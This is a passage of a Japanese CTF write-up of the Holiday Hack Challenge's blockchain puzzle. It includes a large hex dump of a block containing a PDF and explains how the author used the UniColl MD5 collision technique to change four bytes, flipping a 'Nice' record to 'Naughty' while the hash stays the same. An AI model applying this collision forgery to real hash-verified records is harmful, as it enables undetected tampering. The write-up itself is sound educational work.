c34f1dba4b6fd892a31bfcd21d3715ba4e0053604d3d77e46bbcfdeb34a6b7e306e028ea621689484b3c1c334b6f67ec855ebdcd43cc9c19476e36db6cb903619b8ef180677f185c127d5e3f4e1f4c2b8faa3fbd8e498f7746ca5a200f89991e92f238d10c7a9dbe883d7ae9d5174e3fb576ffed5571bf58fbdcc1b7dfb966f45c38c63c7bdf3f7ce5bb3f3afca53ba9ecfe7ffa7afc07af9cdab083ae6fe6a3ece3da3a924bcc648b1430690ca03303cb68180b67d09a59f3be30615930ea75283507843ea91ba10fdd242e23758d321b4c2f829d9977c570d55525ef2eec189c45ecc293934f3347079e4b3da64d09f02b284ebd09c587d9e397fa8fb21593d766bd7f85fb2bf9fd2b499a37fdfed540d8a067f88130e396d2ef5f8da48f7e330abcc25b508c95b3052b6c2c87eb8a74597d0beafcdb676ebcfd4bfd89c143373327261b21064d703544537f9f7a066a6156ea62ea1f532753bf0791fe0e92713fb465e48d0f5a2dcbff4c7cca6ff0fe67ddb91fa57f5f35f561aa01b3fb1344fe811ea302914f5f94aa27d7647e860597fd2ccbafab462bdc43dad842e2c77b235e1b358414cb4d6806c832e669b200eb1b11dfc454131e2f3fd679a40be13d80d73aa49579887c697f40186cd38f7c3558f720bdccdf82f575788d62d98df47720ff360d4aad2f24cb906799e69764ae761bde0929c23a8f7ddfa5bf8730c82fb729f7d986de3e9f6c5425ff35b4c1796621f322f322bb8b3da929d71cd78c6b9bb4e3ba6dba0bfa6dfa21fd25c3bfe624728f1b771a7f9457696a3313f37ecbc39617391757ce3dc64d589fb5796d0fe4f7e6ff9c3fc9ffb37da5fdac63b6638fe38caaa532b20ab3b0e2151c09909d58f81efb7d84c9582ff46674b92da357f451ac81caa5279d6a99c5657a8f5ad620cd9d6a19733339ae9675b83efc9a5ad6931bc9a85a36e07c5da6967388196ad5722ef442482d1bc92ce6a5ccaf65cb989fab6513a9620d6ad94c0ad815b2f41af9577e27d96bd4321041c3aa65869835a25a66c962dcb02a650dd2ec56cb5a52a0b9432deb8857f355b5ac2717352fab650399af3dad9673c82ced5b6a3997795bfb17b56c244b0d3f51cb7964678e512d9bc87539e9becca432e7c775ddbbbb13dd3776c48458341115dafbe237f477efee4a08f3db170815e58bca85357d7dbbf77408abfbfae37dfdd144775f6f59eeeacbc92a842dd84463345122aced6d2fdbd0ddd6a1d00a5b3bfabb3bb774ecdeb727dabf6aa0bda337d6d12f940a97535c5edfd6d13f20572aca1695954f232fa7ed1e10a242a23f1aebe889f65f2ff475ce9443e8efd8dd3d90e8e8476077afd05cb6b54c0845131dbd0921da1b139a328c9b3a3bbbdb3b28b0bda33f1145e2be44174a7addbefeee815877bbdcdb4059660059dad89ae8d8df215c1d4d243a06fa7a6ba303d8174ad6d4dddb3750221ce8ea6eef120e44078458c740f7ee5e44b6dd20cce411101bc5b1f4f6f6edc726f77794a0dc9dfd1d035dddbdbb850179c82ab790e88a26e441f77424fabbdba37bf6dc8026eb8923571bdae84077a20b3beee9181036761c10b6f4f5447b9f2e534441dd74a24e85ee9e787fdf7e2a63e9407b7f47472f76168d45dbbaf77427b0b5ae687fb41d35866aeb6e1fa01a414508f1686f69fdbefebe78074a7acd9a0dd38428a0a2cd81be3dfbb16799bab7a32326f78862efefd8834cd8f19ebebeebe5f174f6f5a3a0b144576996e49d7dbd0964ed13a2b1180e1cb5d5d7beaf47b613aa3991162edadedf87b8f89e68025be91928eb4a24e2570502070e1c288baaa66947cb9461cb81cfc3256e8877a8f6e8975be9d9b301cddf2b9b6e1fb5af3c88ad6b37089be2a89f06144e50094a84b4672e2a5ba476816aec8e2706ca06baf794f5f5ef0e6c6ad840ea4837d98d5702af1b4907891101af28d6a3586a277d244e6e20fd94aa0ba10226df76b200ef15a49c2cc24b206b90aa0ff17b905f20abb1dc8f5cf27794b6db477a3191e652cce7b75681a52daa148d94bb044b6b91bf1d5bd8807c6d88cd6e57205b29a41bd3acccb99bec4339a20859450690ab0369629442c0ad9cf05fb6f15fe1b7d1d240065381722dc2abfc8a9cff55bbddd89240359da01859d21e2afdf508eb43becfd38780741dd47a0388e9a0b5186d556ebb1929b652aa10e5943591a0bdf552aaa62bf4b8097bec44fe766ac934653b6d5bf608a5e53e2c77a93abd0ef5dd4f258851bef4d806e8d479b905aeec1b5ba974fb699f5753b85c1fa0b85aac0fa8e35274d644a5e843a8ac8b032889dc6f172d47a93e63945bf6b15e95b30dbd4ef8dc7e049537aadaa597f6b15f9552e62951f5dd49bf0768bfbdd88740e553ac3cb36f81ea294ab5ae58ba07b1094adb8ef03df877831a653da815a5af36358e0ed0a8ec5247dc43db1570e1d38118d92bfaa8dd7a8b66531b4f6b45f19b4ed54f05ca1bc7721f1d455a8fa5d436f2483aa8a472294a23bf0d39f6d0be15d9baa87744a96d3b545b27e808d2fa8aa92395a58e534829a9a77e21c77b87aad36b304f6cb8628b8a06b37d53b6c91e2aef4056dbbd54da58668c8ab665aa3d6a4fca88f7d07c747dc63e9dd4df148dc6686ba59fa1f34eaa9b84da6b1f9528867f8ac515dfea43de7dd41e4a3c29de9cf894e6a254bf7d2a5f9c66a5842a4b0f8d8f2eea817172152e2c03289dfc5746fd303b6adad5982953650efcb7f964b9e25483d9f1d19f91a50765dca0467f6f26eaf665c56fda125b31076da0f922aefa4f83aa39e1b216e4a8b93c672ea23973e628146fecc67a82ca3340755946c7b01bf19bb0870d445d8b93a9c328d2153ea77242abdaa0830074c16e924f7c10211ba19534c32ab20224bc4b88abc5fb6aaccbf732584106916e05c257627d39c29761eef4e1770d5e9bf03a8a97062f85a21c2902780fa8f552ac9720c7ebf80df492a1350895efebb0de88f735eabd01e1f578af57eb6bb18e771201bdfc8218fd7e1934d269189f84d727419884839f40e81318fc70f843e68f130b7ccf4cbc3cc16cfaa0f583673e60cb3f00cb076020ef73ef87de8fbc1f7f7fe47d5daee53dc823bf07eb2fc797fade5df14ef3ff5af17633790747f64ef93ba17706df49bea37d07d8e6b759878f1b13c6cac7e2638363e7c6c6c726c60c832f0dbfc47cfbc580cff2a2ef45c6777ad3e983a7d9c8536079caf714137a24f20833fc28581ef53d1a78947df8a132df436bbcbe071f28f68d3f30f10023ffa0ee0193b5e145d8041bc80ad4e1c6d3ec94ef995576b81a8765c16f1f5e01bc36e1d587d751bc70cf83e43ebc02b0415acab6de0fc67b3df7faefbde9de23f76ae3b70fde3e7c3b3b7878f830f3ccfe97f73303a105bebe5ebfaf77cd429f3be86ad607d9661d7623ff8c6f6ddbdcf90d9156c9d78a443bb697fbb6af59e0cb0fda9ab538600d125a581f5bc36e62fbd8a3eccbacdeb025e4f56dc66b3c341162a4504e5e8365936f5360137b666a5cea585f84adad8baf1b5cc7ae6d58e06b5cb3d46759e35b1358f3fa9a77d77cb046d7ba061ec7ff86671a5e6e60a586058106a9c15bd430abd1d3ec08da9bad6069e682966606d0d041d21cb04c59188ba5d572d022ff9c9030830ed0c219183ed5b4d5ef5f7f463fb5657dd210da91843b9373b7cadfd2e6ed49dd9d49d2bc7d47cb2980bf0b1fbee71e525bb83e59b1b52519290caf4fc6b020c985412c7085a71ca4363c3090f0d30ff8fd58de87dfc4bfcf8fc05d030a9464f0c43f000398a2062813f86502a50ef8ed97710890f900b9770d10f94b46fa1526997b406d8e322b5fb4e0daf59fcc35eeed0a656e6473747265616d0a656e646f626a0a0a32322030206f626a0a3c3c2f4c656e677468203432362f46696c7465722f466c6174654465636f64653e3e0a73747265616d0a789c5d93cb6edb301045f7fa0a2e93452072f44a0043805f02bc681bd4c907c8d2d8155053022d2ffcf7e5cc555aa00b0987e2ccf0901aa6dbc3eee087397d0f6377e4d99c07df07be8df7d0b139f165f08923d30fddbc8cf4dd5ddb294963eef1719bf97af0e771b54ad29f71ee368787795af7e3899f93f447e8390cfe629e3eb7c7383edea7e9375fd9cfc626756d7a3ec73adfdae97b7be554b35e0e7d9c1ee6c74b4cf917f0f198d8908e1d54bab1e7dbd4761c5a7fe164656d6d564d5327ecfbffe6f20229a773f7ab0d31d4c550b26e5b47a6c8d6e66be14cb974c23938132ec01be15299ac7085dc52f855b922e137c437c26b7cd73a1b702ebc45cc9bf00efc2abc0717c20d781fd959b0e43a0707f177f02f655d07ff4a7c1cfcab4a78f1df09c3bfd418f857b296837fa935177fcd857f2e9e6e837353867fa50c7f52cf3d6274ad062c7b27f8e7f29de09f4b3cc1bf907d11fc0bd90b2dfe72ce04ff5cfe0bc1bfd09af02fc493e04f72e604ff42f645f0cf341ee79f697df867ba2efc33abcdb37489b491f4f9577b9aee1e426c4dbd0cda93d28d83e7bff7651a27c9d2e70f6db0d4a40a656e6473747265616d0a656e646f626a0a0a32332030206f626a0a3c3c2f547970652f506167652f436f6e74656e7473203136203020522f5265736f7572636573203137203020522f4d65646961426f785b30203020363132203739325d2f506172656e742032203020523e3e0a656e646f626a0a0a787265660a302032340a303030303030303030302036353533362066200a30303030303030303138203030303030206e200a30303030303030323033203030303030206e200a30303030303030323536203030303030206e200a30303030303030333039203030303030206e200a30303030303032363232203030303030206e200a30303030303032363733203030303030206e200a30303030303032373133203030303030206e200a30303030303033303932203030303030206e200a30303030303033323739203030303030206e200a30303030303136313332203030303030206e200a30303030303136363738203030303030206e200a30303030303136393933203030303030206e200a30303030303137313932203030303030206e200a30303030303236323134203030303030206e200a30303030303236363733203030303030206e200a30303030303236373731203030303030206e200a30303030303237353033203030303030206e200a30303030303237353536203030303030206e200a30303030303237353838203030303030206e200a30303030303237393234203030303030206e200a30303030303238313133203030303030206e200a30303030303339343133203030303030206e200a30303030303339393039203030303030206e200a0a747261696c65720a3c3c2f53697a652032342f526f6f742031203020523e3e0a7374617274787265660a34303030390a2525454f460abdb32e0cab036e9c7b759928eda9c2c9009285e5106ded793f2415f1ac0ee11953d7808bc3571ffc13c6833478b5e5910a1e5a1de9d875502ae3b74be6218ad8d64161699ca310aa35eb8a7a70b61782e8b7494e203ae7193b36bc462e46cc3f1f7f1d9767eb2b83b6128972a5f83b05725af43f89760d5cb6820694afd8f83b4ebedb2d323036729fa688a5fd2b43b32be004a7c7ab43611b3d7f6976c141ff99f896c48b556bcf8dc3c50d56562319d5eb426b4864213f26da893d6d43ec3e39517715f02e3941630b4d0c3c6baf4c880193ec8d21c07d86032d97df517106022db0c21c33c03402019a43'
               Date: 03/24
               Time: 13:21:41
       PreviousHash: 4a91947439046c2dbaa96db38e924665
  Data Hash to Sign: 347979fece8d403e06f89f8633b5231a
          Signature: b'MJIxJy2iFXJRCN1EwDsqO9NzE2Dq1qlvZuFFlljmQ03+erFpqqgSI1xhfAwlfmI2MqZWXA9RDTVw3+aWPq2S0CKuKvXkDOrX92cPUz5wEMYNfuxrpOFhrK2sks0yeQWPsHFEV4cl6jtkZ//OwdIznTuVgfuA8UDcnqCpzSV9Uu8ugZpAlUY43Y40ecJPFoI/xi+VU4xM0+9vjY0EmQijOj5k89/AbMAD2R3UbFNmmR61w7cVLrDhx3XwTdY2RCc3ovnUYmhgPNnduKIUA/zKbuu95FFi5M2r6c5Mt6F+c9EdLza24xX2J4l3YbmagR/AEBaF9EBMDZ1o5cMTMCtHfw=='

b10b4a6bd373b61f32f4fd3a0cdfbf84

実行すると1011個目のデータが改ざんされたらしい。内容は一つはわけのわからないdataファイル。もう一つはPDFファイルとなっている。

ファイルを書き出すと下のようになり、Jackは素晴らしいとほめたたえている。これはおかしい。

f:id:kataware8136:20210117171339p:plain
Nice Jack

ヒントにはMD5衝突のスライドGitHubが紹介されているので見てみる。

ハッシュの特性ですが、二つの異なるデータのハッシュ値が同じとき、その二つのデータに、ある文字列をそれぞれ加えてもハッシュ値は同一となるという性質があります。Githubにもありますが、下記の通り。

hash(A) = hash(B) -> hash(A + C) = hash(B + C)

今回は4byte変更すればいいとのことなので、その中のテクニックを見てみると、Unicollというものが2byteの書き換えでMD5が一緒になるらしい。

そこでGithubPDFの攻撃の部分を読むとPDFの構造とコメントを細工することでUnicollができることがわかる。

PDF-parserで見てみると、参照するページの後に変なコメントが挿入されていることがわかる。そして複数のページが仕込まれており、2を3に変更して、そのあとのコメントの適切な1byteを書き換えればよさそう。

obj 1 0
 Type: /Catalog
 Referencing: 2 0 R

  <<
    /Type /Catalog
    /_Go_Away /Santa
    /Pages '2 0 R      0\xf9\xd9\xbfW\x8e<\xaa\xe5\rx\x8f\xe7`\xf3\x1dd\xaf\xaa\x1e\xa1\xf2\xa1=cu>\x1a\xa5\xbf\x80bO\xc3F\xbf\xd6g\xca\xf7I\x95\x91\xc4\x02\x01\xed\xab\x03\xb9\xef\x95\x99\x1c[I\x9f\x86\xdc\x859\x85\x90\x99\xadT\xb0\x1es?\xe5\xa7\xa4\x89\xb92\x95\xffTh\x03MIy8\xe8\xf9\xb8\xcb:\xc3\xcfP\xf0\x1b2[\x9b\x17tu\x95B+sx\xf0%\x02\xe1\xa9\xb0\xac\x85(\x01z\x9e'
  >>


obj 2 0
 Type: /Pages
 Referencing: 23 0 R

  <<
    /Type /Pages
    /Count 1
    /Kids [23 0 R]
  >>


obj 3 0
 Type: /Pages
 Referencing: 15 0 R

  <<
    /Type /Pages
    /Count 1
    /Kids [15 0 R]
  >>

書き換えた後で見てみるとPDFの中身が変わる。Jack悪い奴という文章になる。

f:id:kataware8136:20210117171419p:plain
Naughty Jack

ただこれでは4バイト中の2バイトのみ、あとの2バイトを探す。

いろいろヒント見ながら探してたら、ブロックの中のSign: 1 (Nice)の部分がおかしいということに気づく。JackがPDFの内容を変えるとよいというのはおかしく、これを0 (Naughty)にする必要がある。

ここを0に変化させ、MD5が合うようにUnicoll通りにデータを変更する。これで変更する4バイトが見つかるわけだが、私はvimでバイナリデータ変更したら、うまくいかなかった。vim%!xxdを使うと、最後に改行を入れられるせい....

最終的に差分はこのようになった。

f:id:kataware8136:20210117172539p:plain
MD5 衝突

MD5も衝突したのであとはsha256sumで計算して終わり。

$ sha256sum col.dat
fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb    col.dat

このUnicoll、細工したバイナリデータの10バイト目を1増やすか、減らすだけで同じデータが作れるというのは結構衝撃。

この問題を解いた後、サンタの部屋に行くと、閉じられていた奥の部屋に行けるようになっていた。

Jackに話しかけると、どうやらJackは刑務所に行く模様。

奥へ行きサンタに話しかけるとスタッフロールが流れ始める。

f:id:kataware8136:20210117173317p:plain
最後の部屋

完走した感想

まったくもって知らない領域でもヒントを頼りに解くことができるし、いろいろ勉強になるなという感想。

特にUnicoll周りは、それ以外にもハッシュ衝突のテクニックがあるらしく、まだまだ勉強できそう。

あとWriteupは解きながら作るといいです。全部解き終わった後に作り始めたら思い出しながら書くとか、自分のメモがあてにならなくて後悔しました。

最初に書いたようにHoliday Hack Challengeは今からでも解くことはできるので、面白そうと思った方はぜひ!!